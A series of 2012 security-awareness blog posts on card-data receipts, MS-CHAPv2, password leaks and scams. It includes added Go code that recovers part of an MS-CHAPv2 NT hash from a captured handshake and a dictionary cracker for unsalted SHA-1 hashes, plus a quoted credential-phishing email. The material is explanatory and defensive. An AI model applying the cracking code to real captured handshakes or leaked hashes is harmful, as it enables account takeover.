Melbourne Myki System

Melbourne (Australia) has a transport ticket system called Myki. If you use it there’s currently a security risk you should be aware of.

If you purchase a ticket using their ticket vending machines and pay by credit card, the machine issues a receipt. The receipt shows the credit card owner’s full name, the card’s expiry date, and more than the last 4 digits of the card number. Each of these is a security risk on its own; together they give anyone who finds the receipt enough to attempt credit card fraud.

If this applies to you, don’t use a credit card to purchase tickets until the issue is resolved. I can’t verify it, but apparently you can’t avoid printing a receipt. Hopefully all of these issues will be resolved soon.

And for everyone, it’s worth highlighting that you should always check your credit card receipts. A receipt should never show your name, your card’s expiry date, or more than the last 4 digits of the card number; card-industry rules (PCI DSS) require the number to be masked wherever it is displayed or printed. You can’t assume that the payment terminal you use gets this right, as the case above shows.
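The three items above can be checked mechanically. The following Go program is an added example written for this page (it is not code from the original post or from Myki): it scans receipt text for a Luhn-valid full card number, an expiry date, and the cardholder’s name, and shows how a number should be masked. The sample receipt is constructed, not a real Myki receipt, and 4111 1111 1111 1111 is a standard test card number.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Finding is one item of cardholder data that a receipt should not carry.
type Finding struct {
	Line  int
	Issue string
}

var (
	// Runs of 13-19 digits, optionally grouped by spaces or dashes: the shape of a full card number.
	panRe = regexp.MustCompile(`\b(?:\d[ -]?){12,18}\d\b`)
	// MM/YY or MM/YYYY that is not part of a longer date such as 16/07/2012.
	expiryRe = regexp.MustCompile(`(?:^|[^\d/])(?:0[1-9]|1[0-2])/(?:\d{2}|\d{4})(?:$|[^\d/])`)
	strip    = strings.NewReplacer(" ", "", "-", "")
)

// luhnValid reports whether a digit string passes the Luhn check every card number satisfies,
// which filters out reference numbers and timestamps that merely look like card numbers.
func luhnValid(digits string) bool {
	sum, double := 0, false
	for i := len(digits) - 1; i >= 0; i-- {
		d := int(digits[i] - '0')
		if double {
			d *= 2
			if d > 9 {
				d -= 9
			}
		}
		sum += d
		double = !double
	}
	return sum%10 == 0
}

// MaskPAN keeps only the last four digits, which is all a receipt needs to show.
func MaskPAN(pan string) string {
	d := strip.Replace(pan)
	if len(d) <= 4 {
		return d
	}
	return strings.Repeat("*", len(d)-4) + d[len(d)-4:]
}

// AuditReceipt scans receipt text line by line and returns everything that should not be printed:
// a Luhn-valid full card number, an expiry date, or the cardholder's name.
func AuditReceipt(receipt, holderName string) []Finding {
	var findings []Finding
	for i, line := range strings.Split(receipt, "\n") {
		for _, m := range panRe.FindAllString(line, -1) {
			if luhnValid(strip.Replace(m)) {
				findings = append(findings, Finding{i + 1, "full card number printed, should be " + MaskPAN(m)})
			}
		}
		if expiryRe.MatchString(line) {
			findings = append(findings, Finding{i + 1, "expiry date printed"})
		}
		if holderName != "" && strings.Contains(strings.ToLower(line), strings.ToLower(holderName)) {
			findings = append(findings, Finding{i + 1, "cardholder name printed"})
		}
	}
	return findings
}

// sampleReceipt is a constructed example, not a real Myki receipt; the REF line is a 16-digit
// number that fails the Luhn check and so is correctly ignored.
const sampleReceipt = `TICKET VENDING MACHINE
16/07/2012 09:14
VISA 4111 1111 1111 1111
EXP 07/14
J CITIZEN
MYKI TOP UP   $10.00
REF 2012071609140031`

func main() {
	for _, f := range AuditReceipt(sampleReceipt, "J Citizen") {
		fmt.Printf("line %d: %s\n", f.Line, f.Issue)
	}
}
```

Run against the sample it reports lines 3, 4 and 5; a receipt that prints only `************1111` produces no findings.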

And you should be careful how you dispose of credit card receipts. Recently there’s been a lot of publicity over a hacked iCloud account: the attackers used the last four digits of the owner’s credit card, which some account-recovery processes accept as proof of identity, to gain access to several of his accounts.

If you use Melbourne’s Myki system and pay with a credit card or have ideas on credit card receipts please leave a comment below, I’d like to hear more.

MS-CHAPv2 Can Be Cracked

This post is a bit technical and isn’t for everyone. I still want to include it because it could help someone, someday.

MS-CHAP v2 is an authentication protocol used to secure VPNs and some wireless networks. It’s commonly used with PPTP VPNs and sometimes with WPA2 Enterprise wireless networks, where it runs as the inner method of PEAP or EAP-TTLS. For the past few years it was considered secure as long as it was used with a strong (long, complicated) password.

Today some researchers at a security conference demonstrated how to crack it in under a day. From a single captured handshake they recover the user’s NT password hash, which is all that is needed to log in as that user and to derive the session keys, so they can decrypt all data sent across the VPN or over WiFi. Password strength does not help: the attack does not guess passwords, it reduces the protocol’s challenge/response to a single exhaustive DES key search.

So if you’re setting up a network and come across the MS-CHAP v2 setting, remember that as of today it’s no longer secure, not even slightly, and not better than nothing. If someone wants to view your encrypted VPN or WiFi traffic and you use MS-CHAP v2, they can, with very little effort. (PEAP wraps the exchange in TLS, which keeps the handshake off the air only if clients actually validate the server certificate.) Full details on cracking MS-CHAP v2 are here.
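The structure the researchers attacked is visible in the response computation itself. The Go program below is an added example written for this page (not code from the original post or from the conference talk): it builds the MS-CHAP v2 response as RFC 2759 specifies, then recovers the last two bytes of the NT hash from the captured challenge and response alone. It assumes the NT hash is already known as a constant (the MD4 of the UTF-16LE string "password"; MD4 is not in Go’s standard library), and uses constructed nonces and the user name "alice".

```go
package main

import (
	"crypto/des"
	"crypto/sha1"
	"encoding/hex"
	"fmt"
)

// ntHashOfPassword is MD4 over the UTF-16LE encoding of the string "password" (MD4 is not in Go's
// standard library, so the value is a constant here). It is the secret MS-CHAP v2 actually proves.
var ntHashOfPassword, _ = hex.DecodeString("8846f7eaee8fb117ad06bdd830b7586c")

// ChallengeHash is the 8-byte value both sides derive from the two nonces and the user name (RFC 2759).
func ChallengeHash(peerChallenge, authChallenge [16]byte, username string) [8]byte {
	h := sha1.New()
	h.Write(peerChallenge[:])
	h.Write(authChallenge[:])
	h.Write([]byte(username))
	var out [8]byte
	copy(out[:], h.Sum(nil))
	return out
}

// desKey spreads 7 key bytes over 8, leaving the low (parity) bit of each byte clear; Go's DES ignores parity.
func desKey(k7 []byte) []byte {
	var v uint64
	for _, b := range k7 {
		v = v<<8 | uint64(b)
	}
	k := make([]byte, 8)
	for i := 7; i >= 0; i-- {
		k[i] = byte(v&0x7f) << 1
		v >>= 7
	}
	return k
}

// NTResponse is the 24-byte proof the client sends: the 16-byte NT hash is zero-padded to 21 bytes,
// cut into three 7-byte DES keys, and each key encrypts the same challenge hash. Keys 1 and 2 carry
// 112 bits of the hash; key 3 carries only hash[14:16] followed by five zero bytes.
func NTResponse(challenge [8]byte, ntHash []byte) [24]byte {
	var padded [21]byte
	copy(padded[:], ntHash)
	var resp [24]byte
	for i := 0; i < 3; i++ {
		blk, _ := des.NewCipher(desKey(padded[7*i : 7*i+7]))
		blk.Encrypt(resp[8*i:8*i+8], challenge[:])
	}
	return resp
}

// RecoverHashTail is what an eavesdropper holding the challenge and response can do immediately:
// only 2^16 keys are possible for the third block, so hash[14:16] falls out in milliseconds. The other
// 14 bytes need one exhaustive DES search (2^56), because both remaining keys encrypt the same
// plaintext and every candidate key can be checked against both ciphertexts in the same pass; that
// is the search the conference demonstration ran. The password never enters into it.
func RecoverHashTail(challenge [8]byte, resp [24]byte) ([2]byte, bool) {
	var want, got [8]byte
	copy(want[:], resp[16:])
	for cand := 0; cand < 1<<16; cand++ {
		k := []byte{byte(cand >> 8), byte(cand), 0, 0, 0, 0, 0}
		blk, _ := des.NewCipher(desKey(k))
		blk.Encrypt(got[:], challenge[:])
		if got == want {
			return [2]byte{byte(cand >> 8), byte(cand)}, true
		}
	}
	return [2]byte{}, false
}

func main() {
	var peer, auth [16]byte // constructed nonces; real ones are random
	for i := range peer {
		peer[i], auth[i] = byte(i), byte(0xff-i)
	}
	challenge := ChallengeHash(peer, auth, "alice")
	resp := NTResponse(challenge, ntHashOfPassword)
	tail, ok := RecoverHashTail(challenge, resp)
	fmt.Printf("response    %x\nhash[14:16] %x recovered=%v\n", resp, tail, ok)
}
```

Recovering the NT hash is enough: the client never proves it knows the password, only the hash, and the session keys are derived from the same hash.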

Yahoo! Passwords Stolen

If you have ever used a Yahoo! service, now might be a good time to change your password. Yesterday someone stole a list of passwords from one of Yahoo!’s servers; it contained details of 450,000 accounts. The server was for Yahoo! Voices, so if you’ve ever used Yahoo! Voices you should treat your account as compromised. And if you’ve ever used the same password on other web sites then those accounts are vulnerable as well.

Why didn’t Yahoo! use better security?

Reports say that the attackers used a SQL injection attack to steal the list, a common way of breaking into web sites. There are many ways of storing passwords on a server, and Yahoo! did not use a proper one (a salted, deliberately slow hash), so the passwords were trivially recovered as plain text. In short, Yahoo!’s programmers cut corners and their security wasn’t good enough.

What can we learn from Yahoo!’s mistakes?

  • Yahoo’s problem is also your problem. Don’t ignore security alerts like this.
  • If you work in software development, don’t cut corners. Use parameterised queries (prepared statements) so user input is never spliced into SQL text; that blocks SQL injection at the source. And never store passwords in plain text, as MD5, or as any other fast unsalted hash: use a salted, deliberately slow password hash such as bcrypt or PBKDF2.
  • Everyone should use good passwords: long, mixed with numbers and made-up words.
  • Never reuse a password across sites.

Update (16 July 2012):

Yahoo! has confirmed the breach and has fixed up the source of the problem. In their words, “We have… now fixed this vulnerability, deployed additional security measures for affected Yahoo! users, enhanced our underlying security controls and are in the process of notifying affected users”.

You should still change your password.

Facebook Gets Tough On Malware

Facebook are stepping things up a notch and getting tough on malware, in a good way. Their latest initiative can detect malware on your computer. If anything suspicious is found, your Facebook account is temporarily locked (to prevent the malware sending spam using your account), and you’ll be asked to download an anti-virus program called McAfee Scan & Repair. There’s also an option to use Microsoft Security Essentials (MSE).

This new procedure can also be invoked manually, if you suspect your computer might be infected. The link is, and you’ll need to enter your password. Note: when entering passwords, always look at the address bar at the top of your browser and make sure it’s genuine – in this case, it needs to have in the address.

If your account is temporarily locked because malware was detected or because you manually started the procedure, you won’t be able to unlock the account until you finish the virus scan.

This is all for Windows. OS X users will have a slightly different procedure.

There are more details on Facebook’s web site.

Formspring Password Resets

Formspring is a social network with about 27 million members. Today they had a security breach and have reset all of their members’ passwords. If you see the following notice it’s probably genuine, but to be sure, don’t click on any links in it: open a new browser tab, go to Formspring yourself, and sign in.

Dear Formspring user,
For security reasons, we have disabled your password and ask that you reset it. When you log back into Formspring, you will be prompted to change your password.
Thank you for taking the time to reset your password.
The Formspring Team


Gmail Detects Hack Attempts

Google has always put a lot of work into making Gmail secure. Their latest feature is interesting.

If Google’s systems detect unusual attempts to access an account, they now show a warning at the top of the Gmail screen saying the account may be the target of state-sponsored attackers. It doesn’t mean your account has been hacked, only that it’s being targeted.

Google security warning

If you ever see this, you’ll be advised to change your password (make it a strong one) and to enable two-step verification, which uses your mobile phone as an additional way of protecting your account.

LinkedIn iPhone App

LinkedIn has an iPhone and iPad app. One of its features is “an opt-in feature which allows users to view calendar entries within the app”.

Some security researchers have been analysing this app and have discovered that when the calendar feature is enabled it sends data to LinkedIn’s servers: all of your calendar events, without explicitly asking for your permission.

This is a privacy risk. If you use the LinkedIn app on iOS, turn the calendar feature off.

You should expect LinkedIn to make a statement about this issue, and eventually resolve it. I’ll post any updates here as they happen.

Update 7 Jun 2012:

LinkedIn have responded to these privacy concerns – you can read their comments here. Basically they confirm that the calendar data is sent and explain why. They’ve also made changes to their iOS app to address the issue; the updated version is 5.0.3.

And at the same time someone in Russia claims to have hacked LinkedIn’s servers and has a list of over 6 million hashed passwords. A hashed password can’t be read directly, but it can be recovered by hashing guesses and comparing the results, and if the hashes are fast and unsalted that takes very little time. This incident is unconfirmed by LinkedIn, but it would be a good time to change your account password.
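To make “given enough time it can be found” concrete, here is an added example in Go written for this page (not from the original post, and not what the person holding the list actually ran). It assumes the leaked list is unsalted SHA-1, which this page does not state and is taken here only for illustration: with no salt, each guess is hashed once and checked against every account in the list at the same time. The “leak” is constructed inside the program from four plaintexts, three guessable and one random.

```go
package main

import (
	"crypto/sha1"
	"encoding/hex"
	"fmt"
	"strconv"
	"strings"
)

// candidates applies the mangling rules crackers try first: the word as-is, capitalised,
// and each of those with two digits appended.
func candidates(word string) []string {
	if word == "" {
		return nil
	}
	bases := []string{word, strings.ToUpper(word[:1]) + word[1:]}
	out := append([]string(nil), bases...)
	for _, b := range bases {
		for n := 0; n < 100; n++ {
			out = append(out, b+strconv.Itoa(n))
		}
	}
	return out
}

// CrackUnsalted tests every candidate against the whole leaked list at once: without a salt,
// one SHA-1 computation covers every account. It returns hash -> recovered password.
func CrackUnsalted(leakedHexHashes, wordlist []string) map[string]string {
	targets := make(map[string]bool, len(leakedHexHashes))
	for _, h := range leakedHexHashes {
		targets[strings.ToLower(h)] = true
	}
	found := map[string]string{}
	for _, w := range wordlist {
		for _, c := range candidates(w) {
			sum := sha1.Sum([]byte(c))
			h := hex.EncodeToString(sum[:])
			if targets[h] && found[h] == "" {
				found[h] = c
				if len(found) == len(targets) {
					return found
				}
			}
		}
	}
	return found
}

// leakedHashes is a constructed "dump": unsalted SHA-1 of three guessable passwords and one random one.
var leakedHashes = func() []string {
	var out []string
	for _, p := range []string{"linkedin", "Password1", "sunshine42", "Xq7!vR2#pLm9wZ"} {
		s := sha1.Sum([]byte(p))
		out = append(out, hex.EncodeToString(s[:]))
	}
	return out
}()

// wordlist stands in for the multi-million-entry lists attackers actually use.
var wordlist = []string{"password", "linkedin", "sunshine", "letmein", "qwerty"}

func main() {
	found := CrackUnsalted(leakedHashes, wordlist)
	for _, h := range leakedHashes {
		if p, ok := found[h]; ok {
			fmt.Printf("%s  %s\n", h, p)
		} else {
			fmt.Printf("%s  (not found)\n", h)
		}
	}
}
```

Three of the four fall to a five-word list with trivial mangling; only the random password survives, and a per-user salt is what would force the attacker to repeat this work for every account separately.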

Helpdesk Scam

If you or your company has a helpdesk, you should understand that they never need to know your password. So if you receive an email asking for your login and password, you should immediately suspect a scam.

The following email is a scam. It’s made to look like a serious IT request but it’s really a trick to get your account details.

Help Desk

Attention Account User,

Scheduled Maintenance & Upgrade

Your account is in the process of being upgraded to a newest of Windows-based servers and an enhanced online email interface inline with internet infrastructure Maintenance. The new servers will provide better anti-spam and anti-virus functions, along with IMAP Support for mobile devices that Support IMAP to enhance your usage.

To ensure that your account is not intermittently disrupted but active during and after this upgrade, you are required to kindly confirm your account by stating the details below:

* User name:

* Password:

This will prompt the upgrade of your account.

Failure to acknowledge receipt of this notification, might result to a temporal deactivation of your account from our database.

Your account shall remain active upon your confirmation of your login details.

We do apologize for any inconvenience caused.

Help Desk

© Copyright 2012, All Rights Reserved.

Dating Scams

Police in Burwood, Sydney, Australia, are investigating recent fraud cases in which local women were targeted on online dating sites. The women are lured into an online relationship, complete with emails and phone calls, and once the fraudsters have gained their trust they ask for money. The con artists in these cases are based in Singapore and Malaysia.

In one case a lady sent over $100,000. And in nearby Erskineville a woman was tricked into sending $275,000 to a con artist in England.

The scam begins with an ad on an online dating website, targeting Asian women in Sydney. The scammers describe themselves as wealthy bankers or businessmen and send photos stolen from other websites. They string their victim along for up to six months, gaining her trust, and eventually start asking for money.

These scams happen all over the world. Please help raise awareness by talking about this issue with people you know.

Note: because I used the words “online dating”, Google has placed ads on this page with links to online dating websites. Some people who post ads on these sites are not genuine, use your own judgement here.